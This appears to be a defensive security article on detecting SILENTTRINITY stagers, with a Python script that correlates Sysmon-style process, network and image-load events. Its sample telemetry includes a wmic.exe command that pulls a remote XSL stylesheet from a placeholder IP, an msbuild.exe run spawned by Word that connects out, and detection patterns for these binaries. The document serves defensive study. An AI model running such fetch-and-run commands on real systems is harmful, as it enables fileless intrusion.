One Day Sec

How can an organization detect or defend against SILENTTRINITY?

Defensive recommendations focus on the living-off-the-land binaries that SILENTTRINITY's stagers abuse. Monitor for unusual executions of msbuild.exe, powershell.exe and wmic.exe that make outbound network connections, especially where the command line loads a project file, XML document or XSL stylesheet from a remote location (an HTTP URL or UNC path). Track the full parent/child process chain (a document handler or browser spawning msbuild.exe is far more suspicious than devenv.exe doing so), and use image-load telemetry to catch the .NET runtime and assemblies being loaded into processes that do not normally host managed code. AppLocker or WDAC in enforce mode can block untrusted script engines and fileless execution, but note that msbuild.exe and wmic.exe are Microsoft-signed binaries: an allow-by-publisher policy will not stop them unless they are denied explicitly, which is why Microsoft's recommended block rules list msbuild.exe. For more on memory-based evasion, see AtomBombing Exploitation Analysis.
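The correlation described above, written out as an added example (not code from SILENTTRINITY or from this site): it walks Sysmon-style process-create, network-connect and image-load events, flags the watched binaries when they reach the network or reference a remote XML/XSL resource, reports the parent chain for each hit, and notes the .NET runtime being loaded into wmic.exe. The watch list, the rule names and every sample event are constructed for illustration; the field names mirror Sysmon's but the events are not real telemetry.

```python
"""Correlate process-create (1), network-connect (3) and image-load (7) events
to flag msbuild / powershell / wmic abuse of the kind SILENTTRINITY stagers use.
Added example; the watch list and sample events are assumptions, not site code."""
import re

# Assumed watch list: Microsoft-signed hosts that will run attacker-supplied XML/XSL/script.
WATCHED = {"msbuild.exe", "powershell.exe", "pwsh.exe", "wmic.exe"}
# A URL or UNC path in the command line means the project/stylesheet is fetched remotely.
REMOTE_RE = re.compile(r"(?i)(https?://\S+|\\\\[^\s\\]+\\\S+)")
# The .NET runtime DLLs; seeing one loaded into wmic.exe means the XSL hosts managed code.
CLR_RE = re.compile(r"(?i)\\(clr|mscorwks|coreclr)\.dll$")


def base(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


# Constructed sample telemetry (Sysmon-like field names, invented values).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 3300, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\bob\Downloads\invoice.docx"',
     "ParentProcessId": 1200, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 4100, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\Users\bob\AppData\Local\Temp\build.xml",
     "ParentProcessId": 3300, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventID": 3, "ProcessId": 4100, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "ProcessId": 5200, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic.exe os get /format:"https://203.0.113.10/st.xsl"',
     "ParentProcessId": 4800, "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 7, "ProcessId": 5200, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    # Benign: Visual Studio driving a local build, no network activity.
    {"EventID": 1, "ProcessId": 6000, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build",
     "ParentProcessId": 6100, "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Common7\IDE\devenv.exe"},
    # Benign: a browser talking to the network is not on the watch list.
    {"EventID": 3, "ProcessId": 7000, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
]


def process_chain(procs, pid):
    """Walk ParentProcessId links from pid up to the root we know about. When a
    parent's own create event was never seen (it started before logging), fall
    back to the ParentImage recorded on the child and stop there."""
    chain = []
    while pid in procs:
        p = procs[pid]
        chain.append(base(p["Image"]))
        if p["ParentProcessId"] not in procs:
            chain.append(base(p["ParentImage"]))
        pid = p["ParentProcessId"]
    return " > ".join(reversed(chain))


def analyze(events):
    """Return a list of findings; each carries the rule, pid, image, parent chain and detail."""
    procs = {}
    findings = []

    def flag(rule, ev, detail):
        findings.append({"rule": rule, "pid": ev["ProcessId"], "image": base(ev["Image"]),
                         "chain": process_chain(procs, ev["ProcessId"]), "detail": detail})

    for ev in events:
        name = base(ev["Image"])
        if ev["EventID"] == 1:
            procs[ev["ProcessId"]] = ev
            if name in WATCHED:
                m = REMOTE_RE.search(ev["CommandLine"])
                if m:
                    flag("remote_script", ev, "command line references remote resource " + m.group(1).strip('"'))
        elif ev["EventID"] == 3 and name in WATCHED:
            flag("net_connection", ev, f"outbound to {ev['DestinationIp']}:{ev['DestinationPort']}")
        elif ev["EventID"] == 7 and name == "wmic.exe" and CLR_RE.search(ev["ImageLoaded"]):
            flag("clr_in_wmic", ev, ".NET runtime loaded into wmic.exe (XSL stylesheet hosting managed code)")
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['rule']}] pid={f['pid']} {f['chain']}: {f['detail']}")
```

Run against the constructed events, the benign Visual Studio build and the browser connection produce nothing, while the Word-spawned msbuild.exe that reaches out to the network, the wmic.exe call pulling a remote XSL, and the CLR load inside that wmic.exe each produce one finding with its parent chain attached. In a real deployment the same three rules map onto Sysmon Event IDs 1, 3 and 7 (or Security 4688 plus a network sensor), and the chain is what lets an analyst separate a developer's build from a stager.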
Tags: detection, defense, AppLocker, WDAC, process monitoring, fileless execution
